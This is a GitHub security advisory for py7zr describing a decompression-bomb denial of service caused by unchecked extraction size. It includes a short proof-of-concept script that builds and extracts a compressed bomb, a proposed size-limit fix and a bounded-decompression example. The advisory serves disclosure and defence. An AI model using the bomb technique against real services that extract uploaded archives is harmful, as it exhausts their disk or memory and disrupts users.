GHSA-gjrg-mpp7-g774

Source
https://github.com/advisories/GHSA-gjrg-mpp7-g774
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-gjrg-mpp7-g774/GHSA-gjrg-mpp7-g774.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-gjrg-mpp7-g774
Aliases
  • CVE-2026-55195
Published
2026-06-19T21:16:29Z
Modified
2026-06-19T21:30:08.815821744Z
Severity
  • 6.9 (Medium) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Summary
py7zr: Decompression bomb (zip bomb) denial of service via unchecked extraction size
Details

py7zr's Worker.decompress() extracts archive entries without tracking total decompressed size. A crafted .7z file can exhaust disk or memory before the extraction completes.

Measured: 15.6 KB archive → 100 MB output (6,556:1 ratio).

Proof of concept:

import io
import os
import tempfile

import py7zr

# create bomb: compress 100MB of zeros into ~15KB
# (mkstemp instead of the deprecated, race-prone mktemp; the archive is
# then rewritten in place by SevenZipFile in 'w' mode)
fd, bomb_path = tempfile.mkstemp(suffix='.7z')
os.close(fd)
with py7zr.SevenZipFile(bomb_path, 'w') as z:
    z.writef(io.BytesIO(b'\x00' * 100 * 1024 * 1024), 'bomb.bin')

print(f'archive size: {os.path.getsize(bomb_path):,} bytes')

# extract — no size check
with py7zr.SevenZipFile(bomb_path, 'r') as z:
    z.extractall(path=tempfile.mkdtemp())

print('extracted 100 MB from ~15 KB archive')

Root cause: Worker.decompress() in py7zr/worker.py writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python's zipfile max_size parameter.

Fix: track cumulative decompressed bytes and raise before writing if a limit is exceeded:

MAX_EXTRACT_SIZE = 2 * 1024 ** 3  # 2 GB default, configurable

# Sketch of the check inside Worker.decompress(): `decompressed_chunks` stands
# for the decoder's output chunks and `outfile` for the destination handle;
# DecompressionBombError is the proposed new exception type.
total = 0
for chunk in decompressed_chunks:
    total += len(chunk)
    if total > MAX_EXTRACT_SIZE:
        # raise before the offending chunk reaches disk
        raise py7zr.exceptions.DecompressionBombError(
            f'Extraction aborted: decompressed size exceeded {MAX_EXTRACT_SIZE} bytes'
        )
    outfile.write(chunk)

Tested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.
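The cumulative-size check proposed above, worked through as an added example that is not py7zr's code: it uses the standard-library lzma module on an .xz stream as a stand-in for the 7z container, and additionally passes max_length to every decompress() call so that one small input chunk cannot balloon in memory before the running total is checked. The 1 MiB limit, the zero-filled payload and the helper names are constructed for the demo.

```python
import io
import lzma

# Demo limit (constructed); a library default would be far larger and configurable.
MAX_EXTRACT_SIZE = 1 * 1024 * 1024  # 1 MiB


class DecompressionBombError(Exception):
    """Cumulative decompressed output exceeded the configured limit."""


def bounded_decompress(compressed: bytes, sink, max_size: int = MAX_EXTRACT_SIZE,
                       chunk_in: int = 4096, chunk_out: int = 64 * 1024) -> int:
    """Decompress an LZMA/xz stream into `sink`, raising before any byte past
    `max_size` is written. Returns the number of bytes written.

    Two limits are enforced: the running total (the advisory's fix) and
    max_length on each decompress() call, which bounds the in-memory expansion
    of a single input chunk regardless of the compression ratio.
    """
    d = lzma.LZMADecompressor()
    total = 0
    offset = 0
    while not d.eof:
        if d.needs_input:
            if offset >= len(compressed):
                break  # truncated stream: nothing more to feed
            data = compressed[offset:offset + chunk_in]
            offset += chunk_in
        else:
            data = b""  # decompressor still holds buffered output; drain it
        out = d.decompress(data, max_length=chunk_out)
        total += len(out)
        if total > max_size:
            raise DecompressionBombError(
                f"extraction aborted: decompressed size exceeded {max_size} bytes")
        sink.write(out)
    return total


def demo(payload_size: int, limit: int) -> tuple:
    """Build a constructed bomb (zeros compressed with xz) and extract it under
    `limit`. Returns (compressed_len, outcome, bytes_written_to_sink) where
    outcome is the byte count on success or 'aborted' on a tripped limit."""
    bomb = lzma.compress(b"\x00" * payload_size)
    sink = io.BytesIO()
    try:
        written = bounded_decompress(bomb, sink, max_size=limit)
    except DecompressionBombError:
        return len(bomb), "aborted", len(sink.getvalue())
    return len(bomb), written, len(sink.getvalue())
```

On abort the sink never holds more than `max_size` bytes, because the check runs before the offending chunk is written; a small archive that legitimately fits under the limit extracts in full.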

Database specific
{
    "nvd_published_at": null,
    "github_reviewed_at": "2026-06-19T21:16:29Z",
    "github_reviewed": true,
    "severity": "MODERATE",
    "cwe_ids": [
        "CWE-409"
    ]
}
References

Affected packages

PyPI / py7zr

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Fixed
1.1.3

Affected versions

0.*
0.0.3
0.0.4
0.0.5
0.0.6
0.0.7
0.0.8
0.1.0
0.1.1
0.1.2
0.1.3
0.1.4
0.1.5
0.1.6
0.2.0
0.3
0.3.1
0.3.2
0.3.3
0.3.4
0.3.5
0.4a1
0.4a2
0.4b1
0.4
0.4.1
0.4.3
0.4.4
0.5a3
0.5a4
0.5b1
0.5b2
0.5b3
0.5b4
0.5b5
0.5b6
0.5rc2
0.5rc3
0.5
0.5.2
0.5.3
0.5.4
0.5.5
0.6a1
0.6a2
0.6b1
0.6b2
0.6b3
0.6b4
0.6b5
0.6b6
0.6b7
0.6b8
0.6rc0
0.6
0.7.0b1
0.7.0b2
0.7.0b3
0.7.0
0.7.1
0.7.2
0.7.3
0.7.4
0.8.0a1
0.8.0a2
0.8.0a3
0.8.0b1
0.8.0b2
0.8.0b3
0.8.0b4
0.8.0b5
0.8.0b6
0.8.0b7
0.8.0b8
0.8.0
0.8.1
0.8.2
0.8.3
0.8.4
0.8.5
0.9.0a1
0.9.0a2
0.9.0b1
0.9.0b2
0.9.0b3
0.9.0
0.9.1
0.9.2
0.9.3
0.9.4
0.9.5
0.9.7
0.9.8
0.9.9
0.9.10
0.10.0a1
0.10.0a2
0.10.0a3
0.10.0a4
0.10.0a5
0.10.0a6
0.10.0b1
0.10.0b3
0.10.0
0.10.1
0.10.2
0.11.0a1
0.11.0b1
0.11.0b2
0.11.0b3
0.11.0
0.11.1
0.11.2
0.11.3
0.12.0
0.13.0
0.13.1
0.14.0
0.14.1
0.15.0
0.15.1
0.15.2
0.16.0
0.16.1
0.16.2
0.16.3
0.16.4
0.17.0
0.17.1
0.17.2
0.17.3
0.17.4
0.18.0
0.18.1
0.18.3
0.18.4
0.18.5
0.18.6
0.18.7
0.18.9
0.18.10
0.18.11
0.18.12
0.19.0
0.19.1
0.19.2
0.20.0
0.20.1
0.20.2
0.20.4
0.20.5
0.20.6
0.20.7
0.20.8
0.21.0
0.21.1
0.22.0
1.*
1.0.0rc1
1.0.0rc2
1.0.0rc3
1.0.0
1.1.0rc2
1.1.0rc4
1.1.0
1.1.2

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-gjrg-mpp7-g774/GHSA-gjrg-mpp7-g774.json"
last_known_affected_version_range
"<= 1.1.2"